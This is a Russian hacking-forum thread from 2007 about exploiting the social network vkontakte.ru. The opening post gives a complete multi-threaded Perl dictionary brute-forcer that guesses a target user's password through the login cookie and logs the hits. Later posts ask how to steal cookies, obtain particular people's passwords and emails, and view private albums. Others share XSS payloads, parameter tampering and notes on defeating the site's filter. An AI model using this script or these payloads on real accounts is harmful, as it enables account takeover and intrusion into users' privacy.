Некоторые баги vkontakte.ru

Discussion in 'Социальные сети' started by lord_of_keyboard, 29 Jul 2007.

  1. C!klodoL

    C!klodoL Elder - Старейшина

    Joined:
    5 Jun 2007
    Messages:
    302
    Likes Received:
    208
    Reputations:
    4
    так как народ стучит в аську и спрашивает почему не работает скрипт, выкладываю исправленную версию, так как баг с куками прикрыли теперь нужно знать мыло
    Code:
    #!/usr/bin/perl
    
    use IO::Socket;
    use MD5;
    use threads;
    use threads::shared;
    my @pass : shared;
    
    ##########################################
    # C!klodoL
    # vkontakte.ru bruteforce with multi-threads
    ##########################################
    $dic = 'pass.txt';		#словарь паролей
    $id = 111111;		#id цели
    $mail = 'mail%40mail.com';	#мыло, вместо @ вписать %40
    $threads = 4;		#количество потоков
    ##########################################
    
    open (pass, "<$dic");
    
    Next:
    @pass = pass();
    
    for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
    for(@trl) { $_->join; }
    
    sub Brut
    {
    
    while (@pass){
    
    $pass = shift @pass;
    
    $md5 = MD5->hexhash($pass);
    $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);
    print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".
    	"Host: vkontakte.ru\r\n".
    	"Accept: */*\r\n".
                "Content-Type: application/x-www-form-urlencoded\r\n".
                "User-Agent: Mozillo\r\n".
                "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
                "Connection: close\r\n\r\n";
    $answ = <$sock>;
    close $sock;
    print "$pass  $answ";
    if ($answ =~ /302/){
    open (good, '>>good.txt');
    print good "$id:$pass:$md5\n";
    print "$id:$pass:$md5\n";
    close good;
    exit;}
    }
    
    }
    
    goto Next;
    
    sub pass
    {
    	my (@mas);
    	while (<pass>){
    	push @mas, $_;
    	last if (@mas > 500);
    	}
    	chomp @mas;
    	return @mas;
    }
    сегодня заметил что у павлика миранда даже ip не скрывает 8)
     
    #21 C!klodoL, 15 Aug 2007
    Last edited: 23 Aug 2007
  2. gergi

    gergi New Member

    Joined:
    18 May 2007
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Можно украсть cookies пользователя и поставить их на свою машину, как это сделано на примере mail.ru. Только как их тиснуть?
     
  3. edos

    edos Member

    Joined:
    29 Aug 2005
    Messages:
    115
    Likes Received:
    26
    Reputations:
    9
    кто поднаторел в этом деле может мне помоч, надо узнать пас чела там
     
  4. davis

    davis Guest

    Reputations:
    0
    Интересно, а узнать мыло можно? Не прибегая к соц. инженерии... :rolleyes:
     
  5. lsass.exe

    lsass.exe Elder - Старейшина

    Joined:
    5 Aug 2007
    Messages:
    156
    Likes Received:
    161
    Reputations:
    24
    Нашел пару ошибок:
    http://vkontakte.ru/invite.php?m=1&email[]=&first_name[]=&last_name[]=
    Параметр "m" можно указать самому
    http://vkontakte.ru/invite.php?m=2&email[]=&first_name[]=&last_name[]=
    http://vkontakte.ru/invite.php?m=3&email[]=&first_name[]=&last_name[]=
    http://vkontakte.ru/invite.php?m=4&email[]=&first_name[]=&last_name[]=

    + при ретриве пасса на мыло можно указать что угодно,и будет показано сообщение об успешной отправке )

    В принципе ничего серьезного,так мелочи
     
    2 people like this.
  6. Benzin

    Benzin Elder - Старейшина

    Joined:
    15 Jan 2007
    Messages:
    39
    Likes Received:
    8
    Reputations:
    -5
    Xss бы.., эх..
     
  7. davis

    davis Guest

    Reputations:
    0
    А по подробнее, плиз... реально интересно... ;)
     
  8. ыть

    ыть Guest

    Reputations:
    0
    а никто не задумывался как смотреть закрытые альбомы?
    ведь если просто так жипегу он показывает значит ничего такого сильно сложного тама нет... вопрос только как к самой пикче подобраться
     
  9. phol1eadeux

    phol1eadeux Elder - Старейшина

    Joined:
    7 Aug 2007
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -1
    Там есть группа <script language="JavaScript">alert("xak")</script>. Они этот вопрос поднимали уже. Поищи в обсуждениях
     
  10. C!klodoL

    C!klodoL Elder - Старейшина

    Joined:
    5 Jun 2007
    Messages:
    302
    Likes Received:
    208
    Reputations:
    4
    раньше можно было смотреть просто изменив ссылку, сейчас по моему уже нет
     
  11. ыть

    ыть Guest

    Reputations:
    0
    не совсем так
    можно было смотреть альбомы у закрытых анкет, т.е. если анкета закрыта для все кроме какой то группы то альбомы этой анкеты увидеть можно было, но недавно прикрыли и это...
    однако если в превьюхе закрытого альбома есть пикча, то можно эту картинку увидеть в нормальном размере, достаточно изменить в названии картинки m на x, но тут возникает вопрос как смотреть дальше то... ибо имена картинок идут непонятно как... сдается мне что используется в именовании чтото типа хэширования или чего то подобного.. но вот как это для того чтобы раскрутить всю цепочку... это вопрос...
     
    1 person likes this.
  12. _Master-

    _Master- Banned

    Joined:
    30 May 2007
    Messages:
    76
    Likes Received:
    64
    Reputations:
    13
    3 people like this.
  13. TrypoED

    TrypoED Banned

    Joined:
    22 Apr 2007
    Messages:
    145
    Likes Received:
    106
    Reputations:
    -85
    nice :] alert forever :)
     
  14. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    Кстати это прокатывает и на стенах других пользователей.
     
    1 person likes this.
  15. VERte][

    VERte][ Elder - Старейшина

    Joined:
    17 May 2007
    Messages:
    240
    Likes Received:
    163
    Reputations:
    32
    ну вообще, как я понял катит всё что начинается с ! , а вот что с этим дальше сделать...
     
  16. movejump

    movejump Member

    Joined:
    19 Nov 2007
    Messages:
    8
    Likes Received:
    5
    Reputations:
    0
    есть xss активная в друзьях- http://vkontakte.ru/friend.php в быстром поиске.
     
  17. C!klodoL

    C!klodoL Elder - Старейшина

    Joined:
    5 Jun 2007
    Messages:
    302
    Likes Received:
    208
    Reputations:
    4
    боян, всё равно там она никуда не передаётся
     
  18. VERte][

    VERte][ Elder - Старейшина

    Joined:
    17 May 2007
    Messages:
    240
    Likes Received:
    163
    Reputations:
    32
    вообще там очень интересная фильтрация
    1)если написать в тексте на стене && (или ++), причём даже если не подряд, то после второго символа &(+), все удалится вместе с ним
    2)потом бывает фигня что когда запишешь что-то типа &!&!&! то выводится сообщение:"Ваше сообщение добавлено", которое закрывает всю стену, после обновления этого сообщения вообще нет, но это бывает не всегда
    3)если написать javascript то фильтр изменит это на javas?1?ript
    4)если шифровать javascript в url системе то выведется %6Aavascript
    5)если написать только // то оно не выводится, хотя пишут, что сообщение отправлено, наверно это связано с автоопределением ссылки
    вот так вот, так что они там нехилую фильтрацию поставили=)
     
    2 people like this.
  19. lord_of_keyboard

    Reputations:
    0
    Фигня, все эти фильтры так или иначе обходятся.
     
    1 person likes this.
  20. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    мона просто сделать
    PHP:
    hekscript:alert(/xss/)
    тока вот это тока в ие будет работать)

    PS странно, в фф тож сработало)
     
    _________________________
    #40 +toxa+, 22 Nov 2007
    Last edited: 22 Nov 2007